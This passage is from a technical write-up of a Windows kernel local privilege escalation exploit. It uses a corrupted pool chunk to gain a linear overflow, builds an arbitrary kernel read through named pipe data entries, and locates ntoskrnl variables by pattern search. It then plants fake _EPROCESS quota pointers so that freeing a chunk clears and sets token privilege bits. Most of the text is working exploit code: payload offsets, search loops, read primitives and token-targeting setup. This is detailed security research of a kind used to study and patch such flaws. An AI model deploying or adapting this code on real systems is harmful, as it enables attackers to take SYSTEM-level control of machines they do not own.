ffffd20a`a3f79c10  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT

By freeing the ghost chunk and allocating it back, we can write 0x640 - 0x3E0 = 0x260 bytes of arbitrary data into the target chunk T, effectively converting the single-byte BlockSize overwrite into a controlled linear pool overflow. This primitive can be invoked repeatedly, allowing us to build more powerful primitives.

5. Locate the ghost chunk

Assuming the later sprayed target chunks are allocated sequentially, we can search the target chunk handles backwards to locate the ghost chunk. The idea is to free one target chunk via its handle, immediately allocate a ghost-sized chunk, and then test the adjacent target chunk for a linear pool overflow. Searching backwards ensures that a freed target chunk that is not the ghost gets allocated back immediately.

lookaside_t *ghost_lookaside = prepare_lookaside(0x640);
lookaside_t *target_lookaside = prepare_lookaside(0x3E0);
enable_lookaside(2, ghost_lookaside, target_lookaside);

With the help of the dynamic lookaside list, the freed ghost chunk (BlockSize 0x64) will not go back to the normal free mechanism, avoiding a BSOD as its VS chunk header is corrupted:

1: kd> dc ffffd20a`a3f797d0
ffffd20a`a3f797d0  00200030 00300030 00640020 00200064  0. .0.0. .d.d. . // VS header
ffffd20a`a3f797e0  00640064 72460020 6cbebe8c 0e5b280c  d.d. .Fr...l.([.

Note that we cannot search forward sequentially, because there are around 64KB of corrupted chunks between the CNG buffer and the ghost chunk; accidentally freeing any of them would result in an immediate BSOD. We construct the ghost chunk payload as follows; note that the root queue pointers are invalid at this point. We need to stop the search as soon as the target chunk T is found, as freeing a DQE object with an invalid root queue pointer leads to an immediate BSOD.

// craft ghost chunk data in ghost_pipes->payload; payload+0x3F0-0x30 is T's DQE header
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00) = 0xdeadbeef;// QE.Flink, placeholder for leak_root_queue
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08) = 0xdeadbeef;// QE.Blink, placeholder for leak_root_queue
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10) = 0xdeadbeef;// Irp
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x18) = 0;// Security Context
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20) = 0;// Type: Buffered
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x24) = 0xFFFFFFFF;// QuotaInEntry
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x28) = 0xFFFFFFFF;// DataSize
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30) = 0x67676767;// Buf[]: "gggg"
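The offsets used in the payload are easiest to follow as page arithmetic. This hypothetical C helper assumes the layout from the dumps earlier in this post (ghost _POOL_HEADER at page offset 0x7E0, target T at 0xBD0, 0x10-byte pool header, 0x30-byte DQE header) and converts a page offset inside T into an index into the ghost chunk's payload.

```c
#include <assert.h>
#include <stddef.h>

/* Page offsets from the dumps, plus the header sizes described earlier. */
enum {
    GHOST_POOL_HDR  = 0x7E0,
    TARGET_POOL_HDR = 0xBD0,
    POOL_HDR_SIZE   = 0x10,
    DQE_HDR_SIZE    = 0x30,
    GHOST_SIZE      = 0x640,   /* size after BlockSize was set to 0x64 */
};

/* First byte of the ghost chunk's buffered payload (page offset 0x820). */
static size_t ghost_payload_start(void)
{
    return GHOST_POOL_HDR + POOL_HDR_SIZE + DQE_HDR_SIZE;
}

/* Index into ghost_pipes->payload that lands on page offset page_off. */
static size_t ghost_payload_offset(size_t page_off)
{
    assert(page_off >= ghost_payload_start());
    assert(page_off < (size_t)(GHOST_POOL_HDR + GHOST_SIZE)); /* inside the enlarged ghost */
    return page_off - ghost_payload_start();
}
```

So 0x3F0 - 0x30 (0x3C0) is where T's DQE header begins inside the ghost payload, and 0x3F0 - 0x30 - 0x08 is T's ProcessBilled field.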

We can now start the searching:

  _LOG(output, "[*] Searching for overwritten target chunk\n");
  for (ghost_idx = target_pipes->cnt - 2; ghost_idx >= 0; ghost_idx --) {
    BYTE buf[0x10] = { 0 };

    create_hole_at(target_pipes, ghost_idx);		// free DataEntry T[i]
    fill_hole_at(ghost_pipes, ghost_idx);			// alloc ghost chunk
    peek_data(target_pipes, ghost_idx + 1, buf, 8);	// was T[i+1] overwritten?
    if ( *(UINT32*)buf == 0x67676767 ) {			// found "gggg"
      aar_index = ghost_idx + 1;
      aar_pipes = target_pipes;
      _LOG(output, "[+] Target chunk at: index 0x%X, handle 0x%llX\n",
           aar_index, (UINT64)target_pipes->writePipe[aar_index]);
      break;	// stop now: T holds invalid root queue pointers, freeing it would BSOD
    }
    fill_hole_at(target_pipes, ghost_idx);			// refill T[i]
  }
6. Leak a valid root queue pointer

Once the ghost chunk is found, the adjacent target chunk T has been overwritten with controlled data, including DataSize and QuotaInEntry set to 0xFFFFFFFF. As in the overwrite test of the previous step, we can leak a large amount of data with PeekNamedPipe. By reading past the end of the target chunk T into the next page, we obtain a valid root queue pointer.

  BYTE leak[0x480] = { 0 };
  if ( !peek_data(target_pipes, aar_index, leak, sizeof(leak)) ) exp_failed();

  if (*(UINT32*)(leak + 0x430 - 0x8) != 0x3A0) {		// DataSize of the next target chunk
    _LOG(output, "[-] Failed to locate next target chunk of size 0x3a0\n");
    exp_failed();
  }
  leak_root_queue = *(UINT64*)(leak + 0x430 - 0x30);		// QueueEntry.Flink of the next DQE
  target_pool_hdr = *(UINT64*)(leak + 0x430 - 0x30 - 0x10);	// its _POOL_HEADER
  _LOG(output, "[+] Leaked Queue Ptr at\t: 0x%p\n", leak_root_queue);
7. Build an AAR primitive

We can now invoke the controlled linear pool overflow again by freeing the ghost chunk and allocating it back. This time we set the root queue pointers to the valid pointer just leaked, set the IRP pointer to a crafted IRP object in user space, and set DataEntryType to 1 (Unbuffered). The updated target chunk T can now be used as an arbitrary address read (AAR) primitive.

typedef struct pipe_queue_entry_sub {
    UINT64 unk;
    UINT64 unk1;
    UINT64 unk2;
    UINT64 data_ptr;		// AssociatedIrp.SystemBuffer
} pipe_queue_entry_sub_t;

pipe_queue_entry_sub_t * fake_pipe_queue_sub;
fake_pipe_queue_sub = (pipe_queue_entry_sub_t *)malloc(sizeof(pipe_queue_entry_sub_t));
memset(fake_pipe_queue_sub, 0, sizeof(pipe_queue_entry_sub_t));

// update the ghost chunk, fix _POOL_HEADER
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00)= leak_root_queue; // QE.Flink
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08)= leak_root_queue; // QE.Blink
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10)= (UINT64) fake_pipe_queue_sub;
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20)= 1; // Unbuffered
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x08)=0; // Clear ProcessBilled
*(UINT8*) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3)=0x2; // Clear Quota bit
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x6b61656c; // Buf[]: "leak"

create_hole_at(ghost_pipes, ghost_idx);  // free ghost chunk
fill_hole_at(ghost_pipes, ghost_idx);	 // rewrite ghost chunk "GGG0"
current_pipe_offset = 0;

We can now use these two functions to perform AAR of 4/8 or more bytes:

void arb_read_bytes(UINT64 where, int size, BYTE* readbuf)
{
    fake_pipe_queue_sub->data_ptr = where;
    peek_data(aar_pipes, aar_index, readbuf, size);
    current_pipe_offset += size;
}

UINT64 arb_read(UINT64 where, int size)
{
    BYTE readbuf[0x100] = { 0 };
    fake_pipe_queue_sub->data_ptr = where;
    peek_data(aar_pipes, aar_index, readbuf, size);
    current_pipe_offset += size;
    return size > 4 ? *(UINT64*)readbuf : *(UINT32*)readbuf;
}
8. Leak pointers and variables

With the AAR primitive, and the leaked root queue pointer as a starting point, we can leak the pointers and variables needed in this exploit. This step draws on the work and sample code in [3], and requires some reversing of the actual _NP_CCB (Named Pipe Client Control Block) and _NP_FCB (Named Pipe File Control Block) data structures.

From the leaked root queue pointer, we can find the linked file object, and subsequently the device object and the driver object. From the driver object we get the function pointer NpFsdCreate. Although its offset depends on the exact version of NPFS.sys, it is relatively stable across Windows 10 builds, so the npfs base address could be derived from it directly. In the final version, we instead search backwards from NpFsdCreate for the PE header by calling get_pe_base.
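get_pe_base itself is not listed in this post. A common way to implement such a helper is to walk backwards one page at a time from a code pointer until a page begins with an MZ header whose e_lfanew field points at a PE signature. The C sketch below is a hypothetical version of that idea: the memory reader is a callback (in the exploit it would be backed by arb_read_bytes, which is an assumption), and a flat-buffer reader is included so the walk can be tested offline. A little-endian host is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Memory reader callback; returns 1 on success, 0 on failure. */
typedef int (*read_fn)(void *ctx, uint64_t addr, void *out, size_t len);

/* Walk back page by page from code_ptr until an "MZ" page whose e_lfanew
 * points at "PE\0\0" is found; gives up after max_pages extra pages. */
static uint64_t find_pe_base(read_fn rd, void *ctx, uint64_t code_ptr, unsigned max_pages)
{
    uint64_t page = code_ptr & ~(uint64_t)0xFFF;
    assert(rd != NULL);
    for (unsigned i = 0; i <= max_pages; i++, page -= 0x1000) {
        uint16_t mz = 0;
        uint32_t lfanew = 0, sig = 0;
        if (!rd(ctx, page, &mz, sizeof mz) || mz != 0x5A4D)              /* "MZ" */
            continue;
        if (!rd(ctx, page + 0x3C, &lfanew, sizeof lfanew) || lfanew >= 0x1000)
            continue;                                                    /* e_lfanew sanity check */
        if (rd(ctx, page + lfanew, &sig, sizeof sig) && sig == 0x00004550) /* "PE\0\0" */
            return page;
    }
    return 0;
}

/* Flat in-memory reader for testing the walk offline. */
typedef struct {
    uint64_t base;
    const uint8_t *buf;
    size_t len;
} flat_mem;

static int flat_read(void *ctx, uint64_t addr, void *out, size_t len)
{
    const flat_mem *m = (const flat_mem *)ctx;
    if (addr < m->base || addr - m->base > m->len || len > m->len - (addr - m->base))
        return 0;
    memcpy(out, m->buf + (addr - m->base), len);
    return 1;
}
```

The max_pages bound keeps a bad pointer from turning into an unbounded scan; checking the PE signature, not just "MZ", filters out stray MZ bytes at page starts.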

By trial and error, we found two ntoskrnl functions imported by npfs that directly reference the ntoskrnl variables and pointers we need, and we use find_nt_variables to extract their actual addresses in memory. This approach is generic, which matters because ntoskrnl has many different binary releases between 1903 and 20H2. By parsing the code of the imported functions ExFreePoolWithTag and ExAllocatePoolWithQuotaTag, we can derive the addresses of: nt!RtlpHpHeapGlobals, which is referenced when encoding / decoding the _HEAP_VS_CHUNK_HEADER; nt!ExpPoolQuotaCookie, which is later used to encode the ProcessBilled pointer in _POOL_HEADER; and nt!PsInitialSystemProcess, which is needed to traverse the active processes and find the _EPROCESS pointers of our own process and winlogon.exe. The search is implemented by find_address(UINT64 start, BYTE* opcode, BYTE* before, BYTE* after), which takes the start address of the search and the opcode patterns before and after the address to look for. As the memory management code is relatively stable across ntoskrnl binaries, this is expected to work generically on Windows 10, although the algorithm may need adjustments on a build where this step fails.

/* PsInitialSystemProcess - npfs imported ExAllocatePoolWithQuotaTag+0x36
 * ExpPoolQuotaCookie     - npfs imported ExAllocatePoolWithQuotaTag+0x90
 * RtlpHpHeapGlobals      - ExFreeHeapPool+{0xC2,0xBD}: {20Hx,190x}, where
 *                          ExFreeHeapPool is called from npfs imported ExFreePoolWithTag
 * Results are written to RtlpHpHeapGlobals_ptr, PsInitialSystemProcess_ptr and
 * ExpPoolQuotaCookie_ptr (declared elsewhere).
 */
BOOL find_nt_variables(UINT64 npfs_base_addr)
{
  UINT64 ExAllocatePoolWithQuotaTag, ExFreePoolWithTag, ExFreeHeapPool;
  UINT64 ExAllocatePoolWithQuotaTag_ptr, ExFreePoolWithTag_ptr;

  // npfs import address table entries
  ExFreePoolWithTag_ptr = npfs_base_addr + off_Npfs_ExFreePoolWithTag;
  ExAllocatePoolWithQuotaTag_ptr = npfs_base_addr + off_Npfs_ExAllocatePoolWithQuotaTag;

  // resolve the imported ntoskrnl functions through the IAT
  ExAllocatePoolWithQuotaTag = arb_read(ExAllocatePoolWithQuotaTag_ptr, 0x8);
  ExFreePoolWithTag = arb_read(ExFreePoolWithTag_ptr, 0x8);

  /* ExFreePoolWithTag:
   *   48 83 EC 28             sub     rsp, 28h
   *   E8 97 7A CD FF          call    ExFreeHeapPool
   *   48 83 C4 28             add     rsp, 28h
   */
  ExFreeHeapPool = find_address(ExFreePoolWithTag, "\xE8",
          "\x48\x83\xEC\x28", "\x48\x83\xC4\x28");

  /* ExFreeHeapPool:
   *   48 8D 04 49             lea     rax, [rcx+rcx*2]
   *   48 33 1D BC 1B 3F 00    xor     rbx, cs:RtlpHpHeapGlobals
   *   48 33 DF                xor     rbx, rdi
   *   48 C1 E0 06             shl     rax, 6
   */
  RtlpHpHeapGlobals_ptr = find_address(ExFreeHeapPool + 0xBD - 0x10,
          "\x48\x33\x1D", "\x48\x8D\x04\x49", "\x48\x33\xDF\x48");

  /* ExAllocatePoolWithQuotaTag:
   *   44 0F 44 C9             cmovz   r9d, ecx
   *   48 3B 3D D3 EF A3 00    cmp     rdi, cs:PsInitialSystemProcess
   *   41 8D 69 08             lea     ebp, [r9+8]
   */
  PsInitialSystemProcess_ptr = find_address(ExAllocatePoolWithQuotaTag + 0x32 - 0x10,
          "\x48\x3B\x3D", "\x44\x0F\x44\xC9", "\x41\x8D\x69\x08");

  /* ExAllocatePoolWithQuotaTag:
   *   49 8D 5F F0             lea     rbx, [r15-10h]
   *   48 8B 15 29 F5 A3 00    mov     rdx, cs:ExpPoolQuotaCookie
   *   45 33 C0                xor     r8d, r8d
   *   48 8B C2                mov     rax, rdx
   */
  ExpPoolQuotaCookie_ptr = find_address(ExAllocatePoolWithQuotaTag + 0x8C - 0x10,
          "\x48\x8B\x15", "\x49\x8D\x5F\xF0", "\x45\x33\xC0\x48");

  return (RtlpHpHeapGlobals_ptr && PsInitialSystemProcess_ptr && ExpPoolQuotaCookie_ptr);
}
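
One way the find_address pattern search could work is sketched below, under the assumption that the code bytes have already been copied out of kernel memory into a local buffer (for example with repeated arb_read calls); find_address_in_buf and its buffer-based signature are hypothetical. It looks for before | opcode | disp32 | after and resolves the RIP-relative operand as the address of the next instruction plus the signed 32-bit displacement. That holds for all four patterns above, because in each one the displacement is the last field of the instruction (call rel32 and the cs: memory operands). Patterns are compared as C strings, so they must not contain 0x00 bytes, which is true for the patterns in find_nt_variables.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Search buf (a local copy of code located at virtual address buf_va) for
 *   before | opcode | disp32 | after
 * and return the RIP-relative target: end of the instruction + disp32.
 * Returns 0 if the pattern is not found. */
static uint64_t find_address_in_buf(const uint8_t *buf, size_t len, uint64_t buf_va,
                                    const char *opcode, const char *before, const char *after)
{
    size_t op_len = strlen(opcode), pre_len = strlen(before), post_len = strlen(after);
    size_t total = pre_len + op_len + 4 + post_len;

    for (size_t i = 0; i + total <= len; i++) {
        const uint8_t *p = buf + i;
        if (memcmp(p, before, pre_len) != 0 ||
            memcmp(p + pre_len, opcode, op_len) != 0 ||
            memcmp(p + pre_len + op_len + 4, after, post_len) != 0)
            continue;

        int32_t disp;
        memcpy(&disp, p + pre_len + op_len, sizeof disp);        /* little-endian disp32 */
        uint64_t next_insn = buf_va + i + pre_len + op_len + 4;   /* RIP after the instruction */
        return next_insn + (uint64_t)(int64_t)disp;               /* sign-extended add */
    }
    return 0;
}
```

For the ExFreePoolWithTag bytes listed above, the displacement 0xFFCD7A97 is negative (-0x328569), so the sign extension matters: ExFreeHeapPool lies below ExFreePoolWithTag in the image.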

Additionally, we need the _EPROCESS pointers of our own process and winlogon.exe. Since we have already obtained nt!PsInitialSystemProcess, locating these process structures and their Token addresses follows a well-documented procedure: walk the ActiveProcessLinks list and match on the process ID.
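
A minimal sketch of that walk, assuming the same kind of hypothetical 64-bit read callback (arb_read in the exploit) and _EPROCESS offsets supplied by the caller, since UniqueProcessId, ActiveProcessLinks and Token move between builds (on 20H2 they are 0x440, 0x448 and 0x4B8; verify with dt nt!_EPROCESS on the target build). ActiveProcessLinks.Flink points at the next process's ActiveProcessLinks field, not at its _EPROCESS, so the field offset is subtracted at each step. The Token field is an _EX_FAST_REF whose low 4 bits are a reference count and must be masked off. All function names here are ours.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

typedef uint64_t (*read64_fn)(uint64_t addr, void *ctx);

/* Caller-supplied, build-specific _EPROCESS field offsets. */
typedef struct {
    uint64_t unique_process_id;
    uint64_t active_process_links;
    uint64_t token;
} eprocess_offsets;

/* Follow ActiveProcessLinks.Flink starting at the System _EPROCESS.
 * The list head (PsActiveProcessHead) is also on the ring; it is assumed
 * not to match the requested PID. */
static uint64_t find_eprocess_by_pid(uint64_t system_eprocess, uint64_t pid,
                                     const eprocess_offsets *off, read64_fn rd, void *ctx)
{
    uint64_t cur = system_eprocess;
    for (int i = 0; i < 0x10000; i++) {          /* cap the walk in case the list is corrupt */
        if (rd(cur + off->unique_process_id, ctx) == pid)
            return cur;
        cur = rd(cur + off->active_process_links, ctx) - off->active_process_links;
        if (cur == system_eprocess)
            break;                               /* back at the start: not found */
    }
    return 0;
}

/* _EPROCESS.Token is an _EX_FAST_REF: mask off the 4-bit reference count. */
static uint64_t token_from_eprocess(uint64_t eprocess, const eprocess_offsets *off,
                                    read64_fn rd, void *ctx)
{
    return rd(eprocess + off->token, ctx) & ~0xFULL;
}

/* Buffer-backed reader for offline testing. */
typedef struct { const uint8_t *buf; uint64_t base; size_t size; } mem_view;

static uint64_t view_read64(uint64_t addr, void *ctx)
{
    const mem_view *v = (const mem_view *)ctx;
    uint64_t value = 0;
    if (addr >= v->base && addr - v->base + sizeof value <= v->size)
        memcpy(&value, v->buf + (addr - v->base), sizeof value);
    return value;
}
```

Our own PID comes from GetCurrentProcessId(); for winlogon.exe, the PID can be looked up from user mode, or the walk can compare _EPROCESS.ImageFileName instead.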

9. Prepare for arbitrary decrements

When the PoolQuota flag is set in the _POOL_HEADER of a VS chunk, the ProcessBilled field holds an encoded _EPROCESS pointer, which is used to track the quota charged when the chunk is allocated and returned when it is freed. The QuotaBlock structure is not well documented and seems to change across Windows builds, so reversing the relevant functions and some trial and error are required.

0: kd> dt nt!_EPROCESS 0xffffc50d9fc1d030 QuotaBlock
   +0x568 QuotaBlock : 0xffffb203`c294e0a8 _EPROCESS_QUOTA_BLOCK

When a chunk is freed, the QuotaEntry of the relevant quota type is updated. The arbitrary decrement is based on the subtraction in nt!PspReturnQuota, called from nt!ExFreeHeapPool: the chunk size is subtracted from QuotaEntry[PsNonPagedPool].Usage. Therefore, by crafting a fake _EPROCESS whose QuotaBlock pointer points at a chosen offset inside the Token, we can subtract the chunk size from a QWORD overlapping _TOKEN.Privileges, effectively flipping some bits in the Present and Enabled fields.
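
To make the arithmetic concrete, the sketch below models the token bytes around _TOKEN.Privileges (Present at +0x40 and Enabled at +0x48, matching the offsets used later in this post) and applies the decrement as a plain 64-bit subtraction at a possibly unaligned offset, which is how we read the effect of nt!PspReturnQuota here. The privilege bit for LUID n is 1 << n, and SeDebugPrivilege is LUID 20. Little-endian byte order is assumed, as on x64; the helper names are ours.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define TOKEN_PRESENT_OFF  0x40   /* _TOKEN.Privileges.Present */
#define TOKEN_ENABLED_OFF  0x48   /* _TOKEN.Privileges.Enabled */
#define SE_DEBUG_PRIVILEGE 20     /* LUID of SeDebugPrivilege */

/* Model of the decrement: subtract chunk_size from the QWORD at token + off.
 * memcpy keeps the (possibly unaligned) access well defined; the host is
 * assumed to be little-endian, like x64. */
static void quota_decrement(uint8_t *token, size_t off, uint64_t chunk_size)
{
    uint64_t usage;
    memcpy(&usage, token + off, sizeof usage);
    usage -= chunk_size;
    memcpy(token + off, &usage, sizeof usage);
}

static uint64_t read_qword(const uint8_t *token, size_t off)
{
    uint64_t v;
    memcpy(&v, token + off, sizeof v);
    return v;
}

static bool privilege_set(uint64_t mask, unsigned luid)
{
    return (mask >> luid) & 1;
}
```

With the Enabled value used later in this post (0x800000, only SeChangeNotifyPrivilege, LUID 23), one decrement by a 0x3E0-byte chunk at Token + 0x48 leaves 0x7FFC20: the borrow clears bit 23 and sets bits 10 through 22 plus bit 5, so bit 20 (SeDebugPrivilege) ends up enabled.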

__int64 __fastcall ExFreeHeapPool(ULONG_PTR BugCheckParameter2)
{
  // ...
  if ( ChunkAddr & 0xFFF )                      // not page aligned
  {
    OriginalHeader = ChunkAddr - 16;
    if ( *(_BYTE *)(ChunkAddr - 13) & 4 )       // test PoolType & CacheAligned
    {
      OriginalHeader -= 16i64 * (unsigned __int8)*(_WORD *)OriginalHeader;
      *(_BYTE *)(OriginalHeader + 3) |= 4u;
    }
    _PoolType = *(unsigned __int8 *)(OriginalHeader + 3);
    _Tag = *(_DWORD *)(OriginalHeader + 4);
    if ( _PoolType & 8 )                        // PoolQuota flag: ProcessBilled
    {
      Process = (_BYTE *)(OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8));
      if ( OriginalHeader != (ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)) )
      {
        JUMPOUT(Process, 0xFFFF800000000000i64, &BugCheck_C2_466E46);
        JUMPOUT(*Process & 0x7F, 3, &BugCheck_C2_466E46);
        if ( Process != (_BYTE *)PsInitialSystemProcess )
        {
          PspReturnQuota(
            *(char **)((OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)) + 0x568), // QuotaBlock
            (_EPROCESS *)(OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)),
            _PoolType & 1,                                              // quota type
            16i64 * (unsigned __int8)*(_WORD *)(OriginalHeader + 2));  // BlockSize * 16
          Tag = *(unsigned int *)(OriginalHeader + 4);
        }
        ObDereferenceObjectDeferDeleteWithTag((ULONG_PTR)Process);// EPROCESS
      }
    }
    // ...
  }
  // ...
}
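
Reading the decompiled code, a fake _EPROCESS referenced from ProcessBilled has to survive a few checks before PspReturnQuota is reached. The sketch below restates them in C as we interpret the Hex-Rays output, taking both JUMPOUT lines to be bug-check branches: the decoded pointer must be non-zero, lie in kernel space (at or above 0xFFFF800000000000), point to an object whose first byte (the dispatcher header type) has 3 (ProcessObject) in its low 7 bits, and not be the System process, otherwise no quota is returned. The names are hypothetical; header_type stands for the first byte of the fake _EPROCESS, which already satisfies the type check because it is copied from a real process.

```c
#include <assert.h>
#include <stdint.h>

enum billed_result {
    BILLED_NONE,          /* decoded pointer is 0: no quota processing */
    BILLED_BUGCHECK,      /* fails a sanity check: BugCheck 0xC2 */
    BILLED_SKIP_SYSTEM,   /* System process: PspReturnQuota is not called */
    BILLED_RETURN_QUOTA   /* PspReturnQuota runs with this process's QuotaBlock */
};

/* Decode ProcessBilled as nt!ExFreeHeapPool does; pool_header_addr is the
 * address of the _POOL_HEADER (OriginalHeader in the decompiled code). */
static uint64_t decode_process_billed(uint64_t pool_header_addr, uint64_t cookie,
                                      uint64_t process_billed)
{
    return pool_header_addr ^ cookie ^ process_billed;
}

static enum billed_result classify_process_billed(uint64_t process, uint8_t header_type,
                                                  uint64_t system_eprocess)
{
    if (process == 0)
        return BILLED_NONE;
    if (process < 0xFFFF800000000000ULL || (header_type & 0x7F) != 3)
        return BILLED_BUGCHECK;
    if (process == system_eprocess)
        return BILLED_SKIP_SYSTEM;
    return BILLED_RETURN_QUOTA;
}
```

This is also why the fake _EPROCESS is a full copy of a real one rather than a minimal structure: the header byte and the QuotaBlock field both have to be in place.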

In this exploit, the quota type happens to be 0 (PsNonPagedPool), and the Usage field is at offset 0 of each _EPROCESS_QUOTA_ENTRY, so we simply set the QuotaBlock pointer to the address of the least significant byte of the QWORD to decrement:

// note the fake _EPROCESS starts at offset 0x70 of each 0x1000-byte buffer
void setup_fake_eprocess(UINT64 token_addr)
{
  char fake_eproc_buf[0x3000] = { 0 };
  copySelfEprocess(fake_eproc_buf, self_eprocess);
  memcpy(fake_eproc_buf+0x1000, fake_eproc_buf, FAKE_EPROCESS_SIZE);

#ifdef _WINDLL
  // DLL version: three decrements
  memcpy(fake_eproc_buf+0x2000, fake_eproc_buf, FAKE_EPROCESS_SIZE);
  *(UINT64*)(fake_eproc_buf+0x70+off_QuotaBlock)=token_addr+0x4B;  // dec1
  *(UINT64*)(fake_eproc_buf+0x1070+off_QuotaBlock)=token_addr+0x44;// dec2
  *(UINT64*)(fake_eproc_buf+0x2070+off_QuotaBlock)=token_addr+0x3D;// dec3
#else
  // LPE version: two decrements
  *(UINT64*)(fake_eproc_buf+0x70+off_QuotaBlock)= token_addr+0x40;// 0x40 Present
  *(UINT64*)(fake_eproc_buf+0x1070+off_QuotaBlock)= token_addr+0x48;//0x48 Enabled
#endif

  alloc_fake_eprocess(fake_eproc_buf, target_pipes, aar_index + 2);
}

Each fake _EPROCESS is an exact copy of our own process's _EPROCESS, read with the AAR. Because the initial values in the token differ between the LPE version and the DLL version, the two versions decrement at different token offsets, as shown in the code above.

For the free to succeed and the QuotaBlock decrement to take effect, the target chunk T also needs a valid VS chunk header (_HEAP_VS_CHUNK_HEADER): we first leak the VS subsegment address VSSubSegmentAddr with find_vs_subsegment, then rebuild the header with fix_vs_header before freeing T. The previously leaked nt!RtlpHpHeapGlobals is used to derive the HeapKey for encoding the header. The fake _EPROCESS pointer written into ProcessBilled is encoded with encode_ep:

// chunk_addr: address of the _POOL_HEADER
UINT64 encode_ep(UINT64 eproc, UINT64 chunk_addr)
{
    return eproc ^ ExpPoolQuotaCookie ^ chunk_addr;
}

10. Perform decrements

To trigger a decrement, we first use the ghost chunk linear pool overflow to write into T: the crafted, encoded ProcessBilled pointer; the correct root queue pointer target_write_queue for the current T (although T stays at the same address, it is a new block each time it is reallocated, and therefore has a different root queue pointer); the PoolQuota flag in the pool header; and a fixed VS chunk header. After the overflow, freeing T triggers the decrement.

For stability, we need to reclaim chunk T immediately, which also prepares it for the next decrement. This is done with rewrite_pipes, and with rewrite2_pipes if a third decrement is needed. Currently we use 0x200 rewrite pipes to reclaim T reliably. After each reclaim, we invoke the ghost chunk linear pool overflow again to turn T into a leak primitive, which lets us identify which of the rewrite pipes' DQE objects now occupies T:

rewrite_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'V', 0);	// for final decrement
rewrite2_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'Z', 0);// to fill rewrite_pipes
rewrite3_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'A', 0);// to fill rewrite2_pipes

Take the 2nd decrement as an example. We first overwrite T so that it becomes a leak primitive (marked aar2), use it to confirm that the previous reclaim succeeded, and locate the new T chunk. With its handle, we find its original root queue pointer with find_write_queue, using the process handle table. Finally, we invoke the linear pool overflow from the ghost chunk again to set the new ProcessBilled and mark T as dec2, so that it is ready to be freed to perform the 2nd decrement.
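
The marks mentioned above (aar2, dec2, and the GGL2/GGG2 marks on the ghost chunk) are 4-character ASCII tags stored as little-endian 32-bit values, which is why "aar2" appears as 0x32726161 in the code. A small helper, hypothetical and not part of the exploit, makes the correspondence explicit:

```c
#include <assert.h>
#include <stdint.h>

/* Pack a 4-character tag so that, stored as a little-endian UINT32,
 * its bytes appear in string order in memory. */
static uint32_t tag4(const char s[4])
{
    return (uint32_t)(uint8_t)s[0]
         | (uint32_t)(uint8_t)s[1] << 8
         | (uint32_t)(uint8_t)s[2] << 16
         | (uint32_t)(uint8_t)s[3] << 24;
}
```

For example, tag4("VVVV") is the 0x56565656 that the reclaim loop compares against to detect an overwritten rewrite pipe.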

// enable the arb_read() primitive and restore the target chunk to 0x3E0 bytes
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x10) = target_pool_hdr;// _POOL_HEADER
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x08) = 0;		// Clear ProcessBilled
*(UINT8*) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3) = 0x2;	// Clear Quota bit
fix_vs_header((UINT64 *)(ghost_pipes->payload+0x3F0-0x30-0x20), target_page_addr + 0xbe0 - 0x20, 0x3e0);

*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00)=leak_root_queue;// QE.Flink
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08)=leak_root_queue;// QE.Blink
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20)=1;	// Unbuffered -> Buffered
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x32726161;// Buf[]: "aar2"
*(UINT32*)(ghost_pipes->payload+0x00) = 0x324C4747;		// Mark: "GGL2"

create_hole_at(ghost_pipes, ghost_idx);					// free ghost chunk
fill_hole_at(ghost_pipes, ghost_idx);					// rewrite ghost chunk
current_pipe_offset = 0;

for (aar_index = 0; aar_index < NUM_REWRITE_PIPES; aar_index ++) {
  BYTE buf[0x10] = { 0 };
  if (!peek_data(rewrite_pipes, aar_index, buf, 8)) exp_failed();
  if ( *(UINT32*)buf != 0x56565656) {	// found overwrite if not 'VVVV'
    aar_pipes = rewrite_pipes;
    _LOG(output, "[+] Rewrite chunk (aar2/dec2) at: index 0x%X, handle 0x%llX\n", aar_index, (UINT64)rewrite_pipes->writePipe[aar_index]);
    break;
  }
}
if (aar_index == NUM_REWRITE_PIPES) {
  _LOG(output, "[+] First rewrite of 0x3E0 bytes chunks failed. \n");
  exp_failed();
}

// find the WriteQueue of the reclaimed rewrite chunk after ghost overwrite to fix it
find_write_queue(self_eprocess, rewrite_pipes->writePipe[aar_index]);
*(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x00)=target_write_queue;// QE.Flink
*(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x08)=target_write_queue;// QE.Blink
